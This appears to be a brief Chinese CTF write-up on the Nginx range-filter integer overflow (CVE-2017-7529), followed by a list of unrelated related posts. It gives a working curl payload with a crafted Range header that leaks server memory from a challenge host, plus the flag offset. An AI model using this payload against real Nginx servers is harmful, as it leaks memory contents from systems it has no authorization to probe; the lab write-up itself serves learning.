Nginx整数溢出漏洞 Writeup

Nginx整数溢出漏洞 CVE-2017-7529

题目URL：http://www.whalwl.site:8040/

漏洞描述

在 Nginx 的 range filter 中存在整数溢出漏洞，可以通过带有特殊构造的 range 的 HTTP 头的恶意请求引发这个整数溢出漏洞，并导致信息泄露。

扩展阅读
Nginx 整数溢出(CVE-2017-7529)漏洞分析
CVE-2017-7529 poc

payload：
curl -i http://www.whalwl.site:8040/proxy/demo.png -r -17190,-9223372036854758618 > poc.txt
偏移 605可读取flag
17190=16585+605

CTF wp

相关

WPF create Flower shape

WPF 实现简易事件聚合

XCTF---easyjni的WriteUp

WPF的xaml中特殊字符表示

【WPF】三维模型中的“照相机”

Flutter ListView报错RenderBox was not laid out: RenderViewport#680c1 NEEDS-LAYOU

Youngter-drive(BUUCTF)

WindowsXamlHost：在 WPF 中使用 UWP 的控件（Windows Community Toolkit）

UWP 轻量级样式定义（Lightweight Styling）

CTF入门学习3->Web通信基础

ctfshow web入门信息收集

WPF资源加载

标签